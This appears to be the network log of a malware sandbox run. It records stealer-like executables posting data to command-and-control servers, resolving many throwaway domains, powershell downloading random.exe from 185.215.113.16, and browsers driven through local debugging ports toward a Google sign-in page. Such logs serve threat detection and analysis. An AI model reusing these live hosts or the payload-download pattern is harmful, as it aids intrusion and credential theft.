                                                            https://95.217.24.123/
                                                            tls, http
                                                            7aencsM.exe
                                                            2.2kB
                                                            1.0kB
                                                            10
                                                            9

                                                            HTTP Request

                                                            POST https://95.217.24.123/

                                                            HTTP Response

                                                            200
                                                          • 95.217.24.123:443
                                                            https://95.217.24.123/
                                                            tls, http
                                                            7aencsM.exe
                                                            210.5kB
                                                            4.2kB
                                                            163
                                                            93

                                                            HTTP Request

                                                            POST https://95.217.24.123/

                                                            HTTP Response

                                                            200
                                                          • 172.67.161.147:443
                                                            https://penetratebatt.pw/api
                                                            tls, http
                                                            1b80ca21fe.exe
                                                            980 B
                                                            4.4kB
                                                            9
                                                            9

                                                            HTTP Request

                                                            POST https://penetratebatt.pw/api

                                                            HTTP Response

                                                            200
                                                          • 127.0.0.1:9222
                                                            372485f12e.exe
                                                          • 127.0.0.1:9222
                                                            372485f12e.exe
                                                          • 172.67.214.11:443
                                                            https://pasteflawwed.world/api
                                                            tls, http
                                                            1b80ca21fe.exe
                                                            3.9kB
                                                            11.4kB
                                                            18
                                                            21

                                                            HTTP Request

                                                            POST https://pasteflawwed.world/api

                                                            HTTP Response

                                                            403

                                                            HTTP Request

                                                            POST https://pasteflawwed.world/api

                                                            HTTP Response

                                                            200

                                                            HTTP Request

                                                            POST https://pasteflawwed.world/api

                                                            HTTP Response

                                                            200
                                                          • 95.217.24.123:443
                                                            https://95.217.24.123/
                                                            tls, http
                                                            7aencsM.exe
                                                            66.3kB
                                                            1.3kB
                                                            54
                                                            28

                                                            HTTP Request

                                                            POST https://95.217.24.123/
                                                          • 172.67.214.11:443
                                                            https://pasteflawwed.world/api
                                                            tls, http
                                                            1b80ca21fe.exe
                                                            2.2kB
                                                            4.5kB
                                                            9
                                                            10

                                                            HTTP Request

                                                            POST https://pasteflawwed.world/api

                                                            HTTP Response

                                                            200
                                                          • 104.82.234.109:443
                                                            https://steamcommunity.com/profiles/76561199822375128
                                                            tls, http
                                                            3e0505c684.exe
                                                            1.5kB
                                                            43.1kB
                                                            23
                                                            36

                                                            HTTP Request

                                                            GET https://steamcommunity.com/profiles/76561199822375128

                                                            HTTP Response

                                                            200
                                                          • 172.67.214.11:443
                                                            pasteflawwed.world
                                                            tls
                                                            1b80ca21fe.exe
                                                            1.2kB
                                                            4.4kB
                                                            9
                                                            9
                                                          • 185.215.113.115:80
                                                            http://185.215.113.115/c4becf79229cb002.php
                                                            http
                                                            716ddbb44f.exe
                                                            727 B
                                                            625 B
                                                            5
                                                            5

                                                            HTTP Request

                                                            GET http://185.215.113.115/

                                                            HTTP Response

                                                            200

                                                            HTTP Request

                                                            POST http://185.215.113.115/c4becf79229cb002.php

                                                            HTTP Response

                                                            200
                                                          • 104.21.63.231:443
                                                            https://bloodyeleftor.world/api
                                                            tls, http
                                                            3e0505c684.exe
                                                            3.9kB
                                                            11.3kB
                                                            19
                                                            21

                                                            HTTP Request

                                                            POST https://bloodyeleftor.world/api

                                                            HTTP Response

                                                            403

                                                            HTTP Request

                                                            POST https://bloodyeleftor.world/api

                                                            HTTP Response

                                                            200

                                                            HTTP Request

                                                            POST https://bloodyeleftor.world/api

                                                            HTTP Response

                                                            200
                                                          • 104.21.63.231:443
                                                            https://bloodyeleftor.world/api
                                                            tls, http
                                                            3e0505c684.exe
                                                            2.2kB
                                                            4.4kB
                                                            9
                                                            9

                                                            HTTP Request

                                                            POST https://bloodyeleftor.world/api

                                                            HTTP Response

                                                            200
                                                          • 104.21.63.231:443
                                                            https://bloodyeleftor.world/api
                                                            tls, http
                                                            3e0505c684.exe
                                                            1.2kB
                                                            4.4kB
                                                            9
                                                            9

                                                            HTTP Request

                                                            POST https://bloodyeleftor.world/api

                                                            HTTP Response

                                                            200
                                                          • 103.84.89.222:33791
                                                            52206648a6.exe
                                                            152 B
                                                            3
                                                          • 185.215.113.16:80
                                                            http://185.215.113.16/mine/random.exe
                                                            http
                                                            powershell.exe
                                                            53.5kB
                                                            2.2MB
                                                            1060
                                                            1593

                                                            HTTP Request

                                                            GET http://185.215.113.16/mine/random.exe

                                                            HTTP Response

                                                            200
                                                          • 142.250.179.238:443
                                                            https://www.youtube.com/account?=https%3A%2F%2Faccounts.google.com%2Fv3%2Fsignin%2Fchallenge%2Fpwd
                                                            tls, http2
                                                            firefox.exe
                                                            2.1kB
                                                            10.0kB
                                                            16
                                                            21

                                                            HTTP Request

                                                            GET https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd

                                                            HTTP Request

                                                            GET https://www.youtube.com/account?=https%3A%2F%2Faccounts.google.com%2Fv3%2Fsignin%2Fchallenge%2Fpwd
                                                          • 34.120.5.221:443
                                                            https://getpocket.cdn.mozilla.net/v3/firefox/global-recs?version=3&consumer_key=40249-e88c401e1b1f2242d9e441c4&locale_lang=en-US&region=GB&count=30
                                                            tls, http2
                                                            firefox.exe
                                                            1.6kB
                                                            12.4kB
                                                            11
                                                            18

                                                            HTTP Request

                                                            GET https://getpocket.cdn.mozilla.net/v3/firefox/global-recs?version=3&consumer_key=40249-e88c401e1b1f2242d9e441c4&locale_lang=en-US&region=GB&count=30
                                                          • 142.250.180.14:443
                                                            www.youtube.com
                                                            tls, http2
                                                            firefox.exe
                                                            1.3kB
                                                            7.6kB
                                                            11
                                                            10
                                                          • 216.58.201.110:443
                                                            https://consent.youtube.com/m?continue=https%3A%2F%2Fwww.youtube.com%2Faccount%3F%3Dhttps%253A%252F%252Faccounts.google.com%252Fv3%252Fsignin%252Fchallenge%252Fpwd%26cbrd%3D1&gl=GB&m=0&pc=yt&cm=2&hl=en&src=1
                                                            tls, http2
                                                            firefox.exe
                                                            3.9kB
                                                            74.9kB
                                                            51
                                                            62

                                                            HTTP Request

                                                            GET https://consent.youtube.com/m?continue=https%3A%2F%2Fwww.youtube.com%2Faccount%3F%3Dhttps%253A%252F%252Faccounts.google.com%252Fv3%252Fsignin%252Fchallenge%252Fpwd%26cbrd%3D1&gl=GB&m=0&pc=yt&cm=2&hl=en&src=1
                                                          • 34.107.152.202:443
                                                            firefox-settings-attachments.cdn.mozilla.net
                                                            tls
                                                            firefox.exe
                                                            2.0kB
                                                            21.0kB
                                                            23
                                                            22
                                                          • 142.250.200.4:443
                                                            https://www.google.com/favicon.ico
                                                            tls, http2
                                                            firefox.exe
                                                            1.9kB
                                                            7.5kB
                                                            16
                                                            16

                                                            HTTP Request

                                                            GET https://www.google.com/favicon.ico
                                                          • 127.0.0.1:9223
                                                            7aencsM.exe
                                                          • 127.0.0.1:9223
                                                            7aencsM.exe
                                                          • 127.0.0.1:50776
                                                            firefox.exe
                                                          • 185.156.73.73:80
                                                            http://185.156.73.73/service
                                                            http
                                                            BitLockerToGo.exe
                                                            5.4kB
                                                            105.5kB
                                                            42
                                                            92

                                                            HTTP Request

                                                            GET http://185.156.73.73/success?substr=mixfour&s=three&sub=non

                                                            HTTP Response

                                                            200

                                                            HTTP Request

                                                            GET http://185.156.73.73/info

                                                            HTTP Response

                                                            200

                                                            HTTP Request

                                                            GET http://185.156.73.73/update

                                                            HTTP Response

                                                            200

                                                            HTTP Request

                                                            GET http://185.156.73.73/service

                                                            HTTP Response

                                                            200

                                                            HTTP Request

                                                            GET http://185.156.73.73/service

                                                            HTTP Response

                                                            200

                                                            HTTP Request

                                                            GET http://185.156.73.73/service

                                                            HTTP Response

                                                            200

                                                            HTTP Request

                                                            GET http://185.156.73.73/service

                                                            HTTP Response

                                                            200

                                                            HTTP Request

                                                            GET http://185.156.73.73/service

                                                            HTTP Response

                                                            200

                                                            HTTP Request

                                                            GET http://185.156.73.73/service

                                                            HTTP Response

                                                            200
                                                          • 127.0.0.1:50789
                                                            firefox.exe
                                                          • 185.156.73.73:80
                                                            http://185.156.73.73/service
                                                            http
                                                            BitLockerToGo.exe
                                                            4.6kB
                                                            105.2kB
                                                            34
                                                            90

                                                            HTTP Request

                                                            GET http://185.156.73.73/success?substr=mixtwo&s=three&sub=non

                                                            HTTP Response

                                                            200

                                                            HTTP Request

                                                            GET http://185.156.73.73/info

                                                            HTTP Response

                                                            200

                                                            HTTP Request

                                                            GET http://185.156.73.73/update

                                                            HTTP Response

                                                            200

                                                            HTTP Request

                                                            GET http://185.156.73.73/service

                                                            HTTP Response

                                                            200

                                                            HTTP Request

                                                            GET http://185.156.73.73/service

                                                            HTTP Response

                                                            200

                                                            HTTP Request

                                                            GET http://185.156.73.73/service

                                                            HTTP Response

                                                            200

                                                            HTTP Request

                                                            GET http://185.156.73.73/service

                                                            HTTP Response

                                                            200

                                                            HTTP Request

                                                            GET http://185.156.73.73/service

                                                            HTTP Response

                                                            200
                                                          • 103.84.89.222:33791
                                                            52206648a6.exe
                                                            152 B
                                                            3
                                                          • 104.82.234.109:443
                                                            https://steamcommunity.com/profiles/76561199724331900
                                                            tls, http
                                                            BitLockerToGo.exe
                                                            1.3kB
                                                            36.6kB
                                                            18
                                                            32

                                                            HTTP Request

                                                            GET https://steamcommunity.com/profiles/76561199724331900

                                                            HTTP Response

                                                            200
                                                          • 8.8.8.8:53
                                                            penetratebatt.pw
                                                            dns
                                                            1b80ca21fe.exe
                                                            62 B
                                                            94 B
                                                            1
                                                            1

                                                            DNS Request

                                                            penetratebatt.pw

                                                            DNS Response

                                                            172.67.161.147
                                                            104.21.65.100

                                                          • 8.8.8.8:53
                                                            pasteflawwed.world
                                                            dns
                                                            1b80ca21fe.exe
                                                            64 B
                                                            96 B
                                                            1
                                                            1

                                                            DNS Request

                                                            pasteflawwed.world

                                                            DNS Response

                                                            172.67.214.11
                                                            104.21.86.17

                                                          • 8.8.8.8:53
                                                            fv-dev.innocreed.com
                                                            dns
                                                            ScreenConnect.ClientService.exe
                                                            66 B
                                                            82 B
                                                            1
                                                            1

                                                            DNS Request

                                                            fv-dev.innocreed.com

                                                            DNS Response

                                                            45.88.186.185

                                                          • 8.8.8.8:53
                                                            ecozessentials.com
                                                            dns
                                                            f29907a492.exe
                                                            64 B
                                                            137 B
                                                            1
                                                            1

                                                            DNS Request

                                                            ecozessentials.com

                                                          • 8.8.8.8:53
                                                            friendseforever.help
                                                            dns
                                                            DTQCxXZ.exe
                                                            66 B
                                                            131 B
                                                            1
                                                            1

                                                            DNS Request

                                                            friendseforever.help

                                                          • 8.8.8.8:53
                                                            shiningrstars.help
                                                            dns
                                                            Bjkm5hE.exe
                                                            64 B
                                                            129 B
                                                            1
                                                            1

                                                            DNS Request

                                                            shiningrstars.help

                                                          • 8.8.8.8:53
                                                            mercharena.biz
                                                            dns
                                                            Bjkm5hE.exe
                                                            60 B
                                                            122 B
                                                            1
                                                            1

                                                            DNS Request

                                                            mercharena.biz

                                                          • 8.8.8.8:53
                                                            github.com
                                                            dns
                                                            futors.exe
                                                            56 B
                                                            72 B
                                                            1
                                                            1

                                                            DNS Request

                                                            github.com

                                                            DNS Response

                                                            20.26.156.215

                                                          • 8.8.8.8:53
                                                            objects.githubusercontent.com
                                                            dns
                                                            futors.exe
                                                            75 B
                                                            139 B
                                                            1
                                                            1

                                                            DNS Request

                                                            objects.githubusercontent.com

                                                            DNS Response

                                                            185.199.109.133
                                                            185.199.108.133
                                                            185.199.110.133
                                                            185.199.111.133

                                                          • 8.8.8.8:53
                                                            generalmills.pro
                                                            dns
                                                            Bjkm5hE.exe
                                                            62 B
                                                            144 B
                                                            1
                                                            1

                                                            DNS Request

                                                            generalmills.pro

                                                          • 8.8.8.8:53
                                                            stormlegue.com
                                                            dns
                                                            Bjkm5hE.exe
                                                            60 B
                                                            172 B
                                                            1
                                                            1

                                                            DNS Request

                                                            stormlegue.com

                                                            DNS Response

                                                            104.21.96.1
                                                            104.21.16.1
                                                            104.21.64.1
                                                            104.21.48.1
                                                            104.21.80.1
                                                            104.21.32.1
                                                            104.21.112.1

                                                          • 8.8.8.8:53
                                                            avscan.info
                                                            dns
                                                            apisysDirectx.exe
                                                            57 B
                                                            73 B
                                                            1
                                                            1

                                                            DNS Request

                                                            avscan.info

                                                            DNS Response

                                                            31.31.196.252

                                                          • 8.8.8.8:53
                                                            backup.avscan.info
                                                            dns
                                                            apisysDirectx.exe
                                                            64 B
                                                            132 B
                                                            1
                                                            1

                                                            DNS Request

                                                            backup.avscan.info

                                                          • 8.8.8.8:53
                                                            anotherbackup.avscan.info
                                                            dns
                                                            apisysDirectx.exe
                                                            71 B
                                                            139 B
                                                            1
                                                            1

                                                            DNS Request

                                                            anotherbackup.avscan.info

                                                          • 8.8.8.8:53
                                                            naturewsounds.help
                                                            dns
                                                            Bjkm5hE.exe
                                                            64 B
                                                            129 B
                                                            1
                                                            1

                                                            DNS Request

                                                            naturewsounds.help

                                                          • 8.8.8.8:53
                                                            dozzenquear.fun
                                                            dns
                                                            aca90f55db.exe
                                                            61 B
                                                            126 B
                                                            1
                                                            1

                                                            DNS Request

                                                            dozzenquear.fun

                                                          • 8.8.8.8:53
                                                            crl.microsoft.com
                                                            dns
                                                            63 B
                                                            162 B
                                                            1
                                                            1

                                                            DNS Request

                                                            crl.microsoft.com

                                                            DNS Response

                                                            2.19.252.143
                                                            2.19.252.157

                                                          • 8.8.8.8:53
                                                            www.microsoft.com
                                                            dns
                                                            5782e13f6e.exe
                                                            63 B
                                                            230 B
                                                            1
                                                            1

                                                            DNS Request

                                                            www.microsoft.com

                                                            DNS Response

                                                            2.17.5.133

                                                          • 8.8.8.8:53
                                                            posqvevibesonly.tech
                                                            dns
                                                            NL58452.exe
                                                            66 B
                                                            131 B
                                                            1
                                                            1

                                                            DNS Request

                                                            posqvevibesonly.tech

                                                          • 8.8.8.8:53
                                                            httpbin.org
                                                            dns
                                                            372485f12e.exe
                                                            160 B
                                                            250 B
                                                            2
                                                            2

                                                            DNS Request

                                                            httpbin.org

                                                            DNS Request

                                                            httpbin.org

                                                            DNS Response

                                                            3.208.239.150
                                                            3.214.119.249

                                                          • 8.8.8.8:53
                                                            home.fivenn5sr.top
                                                            dns
                                                            372485f12e.exe
                                                            174 B
                                                            226 B
                                                            2
                                                            2

                                                            DNS Request

                                                            home.fivenn5sr.top

                                                            DNS Request

                                                            home.fivenn5sr.top

                                                            DNS Response

                                                            45.156.22.254

                                                          • 8.8.8.8:53
                                                            home.fivenn5sr.top
                                                            dns
                                                            372485f12e.exe
                                                            174 B
                                                            226 B
                                                            2
                                                            2

                                                            DNS Request

                                                            home.fivenn5sr.top

                                                            DNS Request

                                                            home.fivenn5sr.top

                                                            DNS Response

                                                            45.156.22.254

                                                          • 8.8.8.8:53
                                                            rebeldettern.com
                                                            dns
                                                            3e0505c684.exe
                                                            62 B
                                                            135 B
                                                            1
                                                            1

                                                            DNS Request

                                                            rebeldettern.com

                                                          • 8.8.8.8:53
                                                            importenptoc.com
                                                            dns
                                                            3e0505c684.exe
                                                            62 B
                                                            135 B
                                                            1
                                                            1

                                                            DNS Request

                                                            importenptoc.com

                                                          • 8.8.8.8:53
                                                            voicesharped.com
                                                            dns
                                                            3e0505c684.exe
                                                            62 B
                                                            135 B
                                                            1
                                                            1

                                                            DNS Request

                                                            voicesharped.com

                                                          • 8.8.8.8:53
                                                            inputrreparnt.com
                                                            dns
                                                            3e0505c684.exe
                                                            63 B
                                                            136 B
                                                            1
                                                            1

                                                            DNS Request

                                                            inputrreparnt.com

                                                          • 8.8.8.8:53
                                                            torpdidebar.com
                                                            dns
                                                            3e0505c684.exe
                                                            61 B
                                                            134 B
                                                            1
                                                            1

                                                            DNS Request

                                                            torpdidebar.com

                                                          • 8.8.8.8:53
                                                            actiothreaz.com
                                                            dns
                                                            3e0505c684.exe
                                                            61 B
                                                            134 B
                                                            1
                                                            1

                                                            DNS Request

                                                            actiothreaz.com

                                                          • 8.8.8.8:53
                                                            garulouscuto.com
                                                            dns
                                                            3e0505c684.exe
                                                            62 B
                                                            135 B
                                                            1
                                                            1

                                                            DNS Request

                                                            garulouscuto.com

                                                          • 8.8.8.8:53
                                                            breedertremnd.com
                                                            dns
                                                            3e0505c684.exe
                                                            63 B
                                                            136 B
                                                            1
                                                            1

                                                            DNS Request

                                                            breedertremnd.com

                                                          • 8.8.8.8:53
                                                            steamcommunity.com
                                                            dns
                                                            BitLockerToGo.exe
                                                            64 B
                                                            80 B
                                                            1
                                                            1

                                                            DNS Request

                                                            steamcommunity.com

                                                            DNS Response

                                                            104.82.234.109

                                                          • 8.8.8.8:53
                                                            bloodyeleftor.world
                                                            dns
                                                            3e0505c684.exe
                                                            65 B
                                                            97 B
                                                            1
                                                            1

                                                            DNS Request

                                                            bloodyeleftor.world

                                                            DNS Response

                                                            104.21.63.231
                                                            172.67.172.150

                                                          • 8.8.8.8:53
                                                            t.me
                                                            dns
                                                            7aencsM.exe
                                                            50 B
                                                            66 B
                                                            1
                                                            1

                                                            DNS Request

                                                            t.me

                                                            DNS Response

                                                            149.154.167.99

                                                          • 8.8.8.8:53
                                                            fivenn5sr.top
                                                            dns
                                                            372485f12e.exe
                                                            164 B
                                                            226 B
                                                            2
                                                            2

                                                            DNS Request

                                                            fivenn5sr.top

                                                            DNS Request

                                                            fivenn5sr.top

                                                            DNS Response

                                                            45.156.22.254

                                                          • 8.8.8.8:53
                                                            fivenn5sr.top
                                                            dns
                                                            372485f12e.exe
                                                            164 B
                                                            216 B
                                                            2
                                                            2

                                                            DNS Request

                                                            fivenn5sr.top

                                                            DNS Request

                                                            fivenn5sr.top

                                                            DNS Response

                                                            45.156.22.254

                                                          • 8.8.8.8:53
                                                            fivenn5sr.top
                                                            dns
                                                            372485f12e.exe
                                                            164 B
                                                            216 B
                                                            2
                                                            2

                                                            DNS Request

                                                            fivenn5sr.top

                                                            DNS Request

                                                            fivenn5sr.top

                                                            DNS Response

                                                            45.156.22.254

                                                          • 8.8.8.8:53
                                                            www.google.com
                                                            dns
                                                            firefox.exe
                                                            60 B
                                                            76 B
                                                            1
                                                            1

                                                            DNS Request

                                                            www.google.com

                                                            DNS Response

                                                            142.250.200.4

                                                          • 8.8.8.8:53
                                                            ogads-pa.googleapis.com
                                                            dns
                                                            chrome.exe
                                                            69 B
                                                            325 B
                                                            1
                                                            1

                                                            DNS Request

                                                            ogads-pa.googleapis.com

                                                            DNS Response

                                                            142.250.178.10
                                                            172.217.169.42
                                                            216.58.212.202
                                                            142.250.187.202
                                                            216.58.201.106
                                                            142.250.200.10
                                                            142.250.180.10
                                                            172.217.169.10
                                                            142.250.179.234
                                                            216.58.213.10
                                                            142.250.200.42
                                                            216.58.204.74
                                                            172.217.169.74
                                                            216.58.212.234
                                                            172.217.16.234
                                                            142.250.187.234

                                                          • 8.8.8.8:53
                                                            apis.google.com
                                                            dns
                                                            chrome.exe
                                                            61 B
                                                            98 B
                                                            1
                                                            1

                                                            DNS Request

                                                            apis.google.com

                                                            DNS Response

                                                            142.250.200.14

                                                          • 142.250.178.10:443
                                                            ogads-pa.googleapis.com
                                                            https
                                                            chrome.exe
                                                            3.7kB
                                                            7.1kB
                                                            9
                                                            11
                                                          • 8.8.8.8:53
                                                            home.fivenn5sr.top
                                                            dns
                                                            372485f12e.exe
                                                            174 B
                                                            226 B
                                                            2
                                                            2

                                                            DNS Request

                                                            home.fivenn5sr.top

                                                            DNS Request

                                                            home.fivenn5sr.top

                                                            DNS Response

                                                            45.156.22.254

                                                          • 8.8.8.8:53
                                                            play.google.com
                                                            dns
                                                            chrome.exe
                                                            61 B
                                                            77 B
                                                            1
                                                            1

                                                            DNS Request

                                                            play.google.com

                                                            DNS Response

                                                            142.250.178.14

                                                          • 142.250.178.14:443
                                                            play.google.com
                                                            https
                                                            chrome.exe
                                                            3.9kB
                                                            8.4kB
                                                            9
                                                            12
                                                          • 224.0.0.251:5353
                                                            chrome.exe
                                                            136 B
                                                            2
                                                          • 8.8.8.8:53
                                                            breakfasutwy.cyou
                                                            dns
                                                            3e0505c684.exe
                                                            63 B
                                                            128 B
                                                            1
                                                            1

                                                            DNS Request

                                                            breakfasutwy.cyou

                                                          • 127.0.0.1:61695
                                                            372485f12e.exe
                                                          • 8.8.8.8:53
                                                            steamcommunity.com
                                                            dns
                                                            BitLockerToGo.exe
                                                            64 B
                                                            80 B
                                                            1
                                                            1

                                                            DNS Request

                                                            steamcommunity.com

                                                            DNS Response

                                                            104.82.234.109

                                                          • 8.8.8.8:53
                                                            youtube.com
                                                            dns
                                                            firefox.exe
                                                            57 B
                                                            73 B
                                                            1
                                                            1

                                                            DNS Request

                                                            youtube.com

                                                            DNS Response

                                                            142.250.179.238

                                                          • 8.8.8.8:53
                                                            getpocket.cdn.mozilla.net
                                                            dns
                                                            firefox.exe
                                                            71 B
                                                            174 B
                                                            1
                                                            1

                                                            DNS Request

                                                            getpocket.cdn.mozilla.net

                                                            DNS Response

                                                            34.120.5.221

                                                          • 8.8.8.8:53
                                                            spocs.getpocket.com
                                                            dns
                                                            firefox.exe
                                                            65 B
                                                            131 B
                                                            1
                                                            1

                                                            DNS Request

                                                            spocs.getpocket.com

                                                            DNS Response

                                                            34.117.188.166

                                                          • 8.8.8.8:53
                                                            youtube.com
                                                            dns
                                                            firefox.exe
                                                            57 B
                                                            73 B
                                                            1
                                                            1

                                                            DNS Request

                                                            youtube.com

                                                            DNS Response

                                                            142.250.179.238

                                                          • 8.8.8.8:53
                                                            prod.ads.prod.webservices.mozgcp.net
                                                            dns
                                                            firefox.exe
                                                            82 B
                                                            98 B
                                                            1
                                                            1

                                                            DNS Request

                                                            prod.ads.prod.webservices.mozgcp.net

                                                            DNS Response

                                                            34.117.188.166

                                                          • 8.8.8.8:53
                                                            shavar.prod.mozaws.net
                                                            dns
                                                            firefox.exe
                                                            68 B
                                                            116 B
                                                            1
                                                            1

                                                            DNS Request

                                                            shavar.prod.mozaws.net

                                                            DNS Response

                                                            34.209.7.244
                                                            34.208.172.229
                                                            52.24.11.115

                                                          • 8.8.8.8:53
                                                            prod.ads.prod.webservices.mozgcp.net
                                                            dns
                                                            firefox.exe
                                                            82 B
                                                            175 B
                                                            1
                                                            1

                                                            DNS Request

                                                            prod.ads.prod.webservices.mozgcp.net

                                                          • 8.8.8.8:53
                                                            youtube.com
                                                            dns
                                                            firefox.exe
                                                            57 B
                                                            85 B
                                                            1
                                                            1

                                                            DNS Request

                                                            youtube.com

                                                            DNS Response

                                                            2a00:1450:4009:81d::200e

                                                          • 8.8.8.8:53
                                                            shavar.prod.mozaws.net
                                                            dns
                                                            firefox.exe
                                                            68 B
                                                            153 B
                                                            1
                                                            1

                                                            DNS Request

                                                            shavar.prod.mozaws.net

                                                          • 8.8.8.8:53
                                                            prod.content-signature-chains.prod.webservices.mozgcp.net
                                                            dns
                                                            firefox.exe
                                                            103 B
                                                            119 B
                                                            1
                                                            1

                                                            DNS Request

                                                            prod.content-signature-chains.prod.webservices.mozgcp.net

                                                            DNS Response

                                                            34.160.144.191

                                                          • 8.8.8.8:53
                                                            prod.content-signature-chains.prod.webservices.mozgcp.net
                                                            dns
                                                            firefox.exe
                                                            103 B
                                                            131 B
                                                            1
                                                            1

                                                            DNS Request

                                                            prod.content-signature-chains.prod.webservices.mozgcp.net

                                                            DNS Response

                                                            2600:1901:0:92a9::

                                                          • 8.8.8.8:53
                                                            prod.pocket.prod.cloudops.mozgcp.net
                                                            dns
                                                            firefox.exe
                                                            82 B
                                                            98 B
                                                            1
                                                            1

                                                            DNS Request

                                                            prod.pocket.prod.cloudops.mozgcp.net

                                                            DNS Response

                                                            34.120.5.221

                                                          • 8.8.8.8:53
                                                            prod.pocket.prod.cloudops.mozgcp.net
                                                            dns
                                                            firefox.exe
                                                            82 B
                                                            110 B
                                                            1
                                                            1

                                                            DNS Request

                                                            prod.pocket.prod.cloudops.mozgcp.net

                                                            DNS Response

                                                            2600:1901:0:524c::

                                                          • 8.8.8.8:53
                                                            prod.remote-settings.prod.webservices.mozgcp.net
                                                            dns
                                                            firefox.exe
                                                            94 B
                                                            110 B
                                                            1
                                                            1

                                                            DNS Request

                                                            prod.remote-settings.prod.webservices.mozgcp.net

                                                            DNS Response

                                                            34.149.100.209

                                                          • 8.8.8.8:53
                                                            prod.remote-settings.prod.webservices.mozgcp.net
                                                            dns
                                                            firefox.exe
                                                            94 B
                                                            122 B
                                                            1
                                                            1

                                                            DNS Request

                                                            prod.remote-settings.prod.webservices.mozgcp.net

                                                            DNS Response

                                                            2600:1901:0:c47c::

                                                          • 142.250.179.238:443
                                                            youtube.com
                                                            https
                                                            firefox.exe
                                                            1.9kB
                                                            9.3kB
                                                            6
                                                            10
                                                          • 8.8.8.8:53
                                                            www.youtube.com
                                                            dns
                                                            firefox.exe
                                                            61 B
                                                            319 B
                                                            1
                                                            1

                                                            DNS Request

                                                            www.youtube.com

                                                            DNS Response

                                                            142.250.180.14
                                                            142.250.178.14
                                                            172.217.169.14
                                                            216.58.204.78
                                                            216.58.212.206
                                                            142.250.187.238
                                                            172.217.16.238
                                                            216.58.201.110
                                                            142.250.200.14
                                                            142.250.187.206
                                                            172.217.169.78
                                                            142.250.200.46
                                                            216.58.213.14
                                                            142.250.179.238

                                                          • 8.8.8.8:53
                                                            youtube-ui.l.google.com
                                                            dns
                                                            firefox.exe
                                                            69 B
                                                            293 B
                                                            1
                                                            1

                                                            DNS Request

                                                            youtube-ui.l.google.com

                                                            DNS Response

                                                            142.250.179.238
                                                            142.250.200.14
                                                            142.250.180.14
                                                            216.58.201.110
                                                            172.217.16.238
                                                            216.58.213.14
                                                            216.58.212.206
                                                            142.250.178.14
                                                            142.250.187.238
                                                            172.217.169.78
                                                            216.58.204.78
                                                            142.250.187.206
                                                            142.250.200.46
                                                            172.217.169.14

                                                          • 8.8.8.8:53
                                                            youtube-ui.l.google.com
                                                            dns
                                                            firefox.exe
                                                            69 B
                                                            181 B
                                                            1
                                                            1

                                                            DNS Request

                                                            youtube-ui.l.google.com

                                                            DNS Response

                                                            2a00:1450:4009:81d::200e
                                                            2a00:1450:4009:817::200e
                                                            2a00:1450:4009:80a::200e
                                                            2a00:1450:4009:819::200e

                                                          • 142.250.180.14:443
                                                            youtube-ui.l.google.com
                                                            https
                                                            firefox.exe
                                                            3.6kB
                                                            9.4kB
                                                            11
                                                            11
                                                          • 8.8.8.8:53
                                                            consent.youtube.com
                                                            dns
                                                            firefox.exe
                                                            65 B
                                                            81 B
                                                            1
                                                            1

                                                            DNS Request

                                                            consent.youtube.com

                                                            DNS Response

                                                            216.58.201.110

                                                          • 8.8.8.8:53
                                                            firefox-settings-attachments.cdn.mozilla.net
                                                            dns
                                                            firefox.exe
                                                            90 B
                                                            177 B
                                                            1
                                                            1

                                                            DNS Request

                                                            firefox-settings-attachments.cdn.mozilla.net

                                                            DNS Response

                                                            34.107.152.202

                                                          • 8.8.8.8:53
                                                            consent.youtube.com
                                                            dns
                                                            firefox.exe
                                                            65 B
                                                            81 B
                                                            1
                                                            1

                                                            DNS Request

                                                            consent.youtube.com

                                                            DNS Response

                                                            216.58.201.110

                                                          • 8.8.8.8:53
                                                            attachments.prod.remote-settings.prod.webservices.mozgcp.net
                                                            dns
                                                            firefox.exe
                                                            106 B
                                                            122 B
                                                            1
                                                            1

                                                            DNS Request

                                                            attachments.prod.remote-settings.prod.webservices.mozgcp.net

                                                            DNS Response

                                                            34.107.152.202

                                                          • 8.8.8.8:53
                                                            attachments.prod.remote-settings.prod.webservices.mozgcp.net
                                                            dns
                                                            firefox.exe
                                                            106 B
                                                            134 B
                                                            1
                                                            1

                                                            DNS Request

                                                            attachments.prod.remote-settings.prod.webservices.mozgcp.net

                                                            DNS Response

                                                            2600:1901:0:712f::

                                                          • 8.8.8.8:53
                                                            consent.youtube.com
                                                            dns
                                                            firefox.exe
                                                            65 B
                                                            93 B
                                                            1
                                                            1

                                                            DNS Request

                                                            consent.youtube.com

                                                            DNS Response

                                                            2a00:1450:4009:826::200e

                                                          • 216.58.201.110:443
                                                            consent.youtube.com
                                                            https
                                                            firefox.exe
                                                            4.0kB
                                                            10.5kB
                                                            10
                                                            14
                                                          • 8.8.8.8:53
                                                            www.google.com
                                                            dns
                                                            firefox.exe
                                                            60 B
                                                            76 B
                                                            1
                                                            1

                                                            DNS Request

                                                            www.google.com

                                                            DNS Response

                                                            142.250.200.4

                                                          • 8.8.8.8:53
                                                            www.google.com
                                                            dns
                                                            firefox.exe
                                                            60 B
                                                            76 B
                                                            1
                                                            1

                                                            DNS Request

                                                            www.google.com

                                                            DNS Response

                                                            142.250.200.4

                                                          • 8.8.8.8:53
                                                            www.google.com
                                                            dns
                                                            firefox.exe
                                                            60 B
                                                            88 B
                                                            1
                                                            1

                                                            DNS Request

                                                            www.google.com

                                                            DNS Response

                                                            2a00:1450:4009:822::2004

                                                          • 142.250.200.4:443
                                                            www.google.com
                                                            https
                                                            firefox.exe
                                                            3.3kB
                                                            9.3kB
                                                            8
                                                            10
                                                          • 8.8.8.8:53
                                                            consent.youtube.com
                                                            dns
                                                            firefox.exe
                                                            65 B
                                                            81 B
                                                            1
                                                            1

                                                            DNS Request

                                                            consent.youtube.com

                                                            DNS Response

                                                            216.58.201.110

                                                          • 8.8.8.8:53
                                                            consent.youtube.com
                                                            dns
                                                            firefox.exe
                                                            65 B
                                                            81 B
                                                            1
                                                            1

                                                            DNS Request

                                                            consent.youtube.com

                                                            DNS Response

                                                            216.58.201.110

                                                          • 8.8.8.8:53
                                                            edcatiofireeu.shop
                                                            dns
                                                            BitLockerToGo.exe
                                                            64 B
                                                            121 B
                                                            1
                                                            1

                                                            DNS Request

                                                            edcatiofireeu.shop

                                                          • 8.8.8.8:53
                                                            impolitewearr.biz
                                                            dns
                                                            BitLockerToGo.exe
                                                            63 B
                                                            125 B
                                                            1
                                                            1

                                                            DNS Request

                                                            impolitewearr.biz

                                                          • 8.8.8.8:53
                                                            toppyneedus.biz
                                                            dns
                                                            BitLockerToGo.exe
                                                            61 B
                                                            123 B
                                                            1
                                                            1

